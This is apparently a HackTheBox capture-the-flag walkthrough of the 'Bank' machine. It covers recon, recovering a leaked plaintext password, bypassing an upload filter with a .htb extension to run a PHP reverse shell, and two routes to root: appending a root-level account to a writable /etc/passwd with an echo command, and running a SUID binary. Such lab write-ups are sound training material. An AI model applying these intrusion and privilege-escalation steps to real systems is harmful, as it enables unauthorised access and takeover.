HTB: Bank
Summary
Bank was a fun machine that revolved around the theme of hacking into a bank. You first begin the machine by running gobuster against a virtualhostname which is hosting a different webserver than the one on the ip address. You then find a bunch of files that are bank account transactions, which you then download and perform a grep search on the files for password and find that one for one of the files the encryption failed and you can see a plaintext password for the user purplerabbit, which you then use to access the webservice. From the webservice you see an upload feature which you can’t seem to bypass the blacklist of any file that isn’t an image file extension. However perhaps the hardest part of the machine was knowing to view the source code for the support page which told you that the administrator has allowed .htb to execute as php, so then you upload a php reverse shell with the file extension of htb and you get a shell as www-data. The priv esc was very straightforward and involved a writable /etc/passwd file. So without further or do lets get into bank from hackthebox.
Recon
$cat nmap/initial
# Nmap 7.91 scan initiated Fri May 21 18:38:01 2021 as: nmap -A -oN nmap/initial -vvv 10.10.10.29
Nmap scan report for 10.10.10.29
Host is up, received syn-ack (0.023s latency).
Scanned at 2021-05-21 18:38:02 BST for 15s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 08:ee:d0:30:d5:45:e4:59:db:4d:54:a8:dc:5c:ef:15 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAMJ+YATka9wvs0FTz8iNWs6uCiLqSFhmBYoYAorFpozVGkCkU1aEJ7biybFTw/qzS9pbSsaYA+3LyUyvh3BSPGEt1BgGW/H29MuXjkznwVz60JqL4GqaJzYSL3smYYdr3KdJQI/QSvf34WU3pife6LRmJaVk+ETh3wPclyecNtedAAAAFQC1Zb2O2LzvAWf20FdsK8HRPlrx1wAAAIBIBAhLmVd3Tz+o+6Oz39g4Um1le8d3DETINWk3myRvPw8hcnRwAFe1+14h3RX4fr+LKXoR/tYrI138PJyiyl+YtQWhZnJ7j8lqnKRU2YibtnUc44kP9FhUqeAcBNjj4qwG9GyQSWm/Q5CbOokgaa6WfdcnwsUMim0h2Ad8YdU1kAAAAIBy3dOOD8jKHeBdE/oXGG0X9tKSFZv1gPr/kZ7NfqUF0kHU3oZTNK8/2qR0SNHgrZ2cLgKTIuneGS8lauXjC66NNMoUkJcMHpwRkYC0A86LDmhES6OuPsQwAjr1AtUZn97QjYu1d6WPfhTdsRYBuCotgKh2SBkzV1Bcz77Tnp56JA==
| 2048 b8:e0:15:48:2d:0d:f0:f1:73:33:b7:81:64:08:4a:91 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc0rofjHtpSlqkDjjnkEiYcbUrMH0Q4a6PcxqsR3updDGBWu/RK7AGWRSjPn13uil/nl44XF/fkULy7FoXXskByLCHP8FS2gYJApQMvI9n81ERojEA0NIi6VZKP19bl1VFTk7Q5rEPIpab2xqYMBayb1ch7iP95n3iayvHEt/7cSTsddGWKeALi+rrujpnryNViiOIWpqDv+RWtbc2Wuc/FTeGSOt1LBTbtKcLwEehBG+Ym8o8iKTd+zfVudu7v1g3W2Aa3zLuTcePRKLUK3Q2D7k+5aJnWrekpiARQm3NmMkv1NuDLeW3amVBCv6DRJPBqEgSeGMGsnqkR8CKHO9/
| 256 a0:4c:94:d1:7b:6e:a8:fd:07:fe:11:eb:88:d5:16:65 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDH30xnPq1XEub/UFQ2KoHXh9LFKMNMkt60xYF3OrEp1Y5XQd0QyeLXwm6tIqWtb0rWda/ivDgmiB4GzCIMf/HQ=
| 256 2d:79:44:30:c8:bb:5e:8f:07:cf:5b:72:ef:a1:6d:67 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA8MYjFyo+4OwYGTzeuyNd998y6cOx56mIuciim1cvKh
53/tcp open domain syn-ack ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May 21 18:38:17 2021 -- 1 IP address (1 host up) scanned in 15.67 seconds
Then scanning for all open ports on the machine
$nmap -p- --min-rate 1000 -oN nmap/all-ports $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 08:54 BST
Nmap scan report for bank.htb (10.10.10.29)
Host is up (0.078s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
Enumeration of Services
HTTP 80
The first thing I did was add bank.htb to my /etc/hosts file as this is normally the naming convention for hackthebox machines. Next I ran a gobuster on the ip address and another for bank.htb. I didn’t receive anything of interest for web server at the ip address, but I did receive some interesting directories for the virtualhostname
$cat gobuster-main-bank.txt
/uploads (Status: 301) [Size: 305] [--> http://bank.htb/uploads/]
/support.php (Status: 302) [Size: 3291] [--> login.php]
/login.php (Status: 200) [Size: 1974]
/assets (Status: 301) [Size: 304] [--> http://bank.htb/assets/]
/index.php (Status: 302) [Size: 7322] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> index.php]
/inc (Status: 301) [Size: 301] [--> http://bank.htb/inc/]
/balance-transfer (Status: 301) [Size: 314] [--> http://bank.htb/balance-transfer/]
Taking a look over at http://bank.htb/balance-transfer/ just shows a bunch of files with hashes as there names with .acc at the end of the file names, looking into one of these files shows that its encrypted the password and username of the accounts
++OK ENCRYPT SUCCESS
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: st62N4vDC2U6fPplbkRXVx6kYot9hDTJ7ZLV4hzHjtNyjcTuwLsrjzMhXgrfTkY1kKWo1v5lZSTi5NMByf3ROQ9L6A00VZ1fKYDLtJ6sC0LHNyjmNndBdmnkXolSnn77
Email: lLTPu0i703OOC8apwo0KKo4IMqB9OIh9ubZZbh6clV0X4amAynkjMp2yQDIEmZNQaNQm4XyqSznXJKyi8SCUiEt8hbMDbAumnkIshhSaQg8A1GTayv5RayZrJM5VmAhK
Password: UZcch5n7mvIobByJ7EAhcAJWmORJp8tj8FwpLTx7ogvzR4jZIUgVuZRQOJzdR3x0J3quXYCle8U6de5V8lRClItar3oj6VkQZLkWJXiY5d4iraezw5cROG2gJqAQmUGl
CreditCards: 4
Transactions: 4
Balance: 3006892 .
===UserAccount===
Going over to /login.php gives a login screen which I tried to enumerate for an sql injection but there doesn’t appear to be any and trying some basic credentials such as admin:admin didn’t work.
Shell as www-data
So after looking at the other directories and not getting anywhere, I decided to go back and take a look at /balance-transfer and did a recursive wget to download all the files in that directory.
$wget -r http://bank.htb/balance-transfer/
Next I did a grep search to look through all the files password field and found a plaintext password.
$grep -R -i password
--snipped--
cc4b31bcc18c5883483f418ace7032cb.acc:Password: geSCR0aOIiQy5IOjjciLhiegu8RJvPzM3roVszKbRAKXjygCLzn2RCjmKa5g0F247r0A0KMRkwOD54gRDDUvgdR0oXgoDjtLKtlKe8CzFqcKvsC96wEmJwn7uEw7X0SH
68576f20e9732f1b2edc4df5b8533230.acc:Password: !##HTBB4nkP4ssw0rd!##
4e7da1c5f107c306f55bee851108c402.acc:Password: v0DRlNfbtg7pL0tCMBg4J2PZFr8N1AmxBZpWNF8gVgGHgaj2Mz7vCXvioD5qesXQrnNe2VvXcbFsmYv8yCDbA8tYMyp10nRsKEHMAdKMopeKoJSWmw7WFAVr9ksaHkDr
--snipped--
Looking inside the file showed that it was for a user purplerabbit
$cat 68576f20e9732f1b2edc4df5b8533230.acc
--ERR ENCRYPT FAILED
+=================+
| HTB Bank Report |
+=================+
===UserAccount===
Full Name: purplerabbittos purplerabbittopoulos
Email: purplerabbit@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 5
Transactions: 39
Balance: 8842803 .
===UserAccount===
Next I tried logging into ssh with these creds, but I got access denied, so I then tried these credentials on the login page and managed to authenticate to the web service
Next I enumerated this webservice I had access to and found that there was an upload functionality in the support ticket section of the webservice.
I then tried for a little while fuzzing the upload section and it was doing a blacklist on any file that wasn’t a image file extension. So after spending some time fuzzing I came to a half and viewed the web source and found a comment in /support.php which read
<!-- [DEBUG] I added the file extension .htb to execute as php for debugging purposes only [DEBUG] -->
So then I simply renamed my php-reverse-shell.php file to have a .htb file extension to bypass the filter and was able to get reverse shell as the www-data user
$nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.16.91] from bank.htb [10.10.10.29] 40636
Linux bank 4.4.0-79-generic #100~14.04.1-Ubuntu SMP Fri May 19 18:37:52 UTC 2017 i686 athlon i686 GNU/Linux
11:52:22 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
I was then able to cat user.txt from purplerabbit’s home directory as this user.
www-data => Root
Next I saw a mysql password, but this password didn’t lead anywhere and after spending some time enumerating the mysql database and not getting anywhere with the passwords in the database, I moved on.
I ran linpeas against the machine and linpeas found that /etc/passwd was writeable.
[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/etc/passwd
I then added a root2 user with the password of evil
echo root2:wPOZpnYePkDww:0:0:root:/root:/bin/bash >> /etc/passwd
and then did su root2 and input the password of evil and I got access to the machine as root
root@bank:/home/purplerabbit# id
uid=0(root) gid=0(root) groups=0(root)
root@bank:/home/purplerabbit# whoami
root
There was also another way to priv esc on this machine which for some reason linpeas didn’t find and it involved an suid file that instantly gives a root shell
**www-data@bank:/tmp$ find / -type f -user root -perm -4000 2>/dev/null
/var/htb/bin/emergency
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/mtr
/usr/sbin/pppd
/bin/ping
/bin/ping6
/bin/su
/bin/fusermount
/bin/mount
/bin/umount
www-data@bank:/tmp$ /var/htb/bin/emergency
# whoami
root
That was bank from hackthebox! Hope that you enjoyed!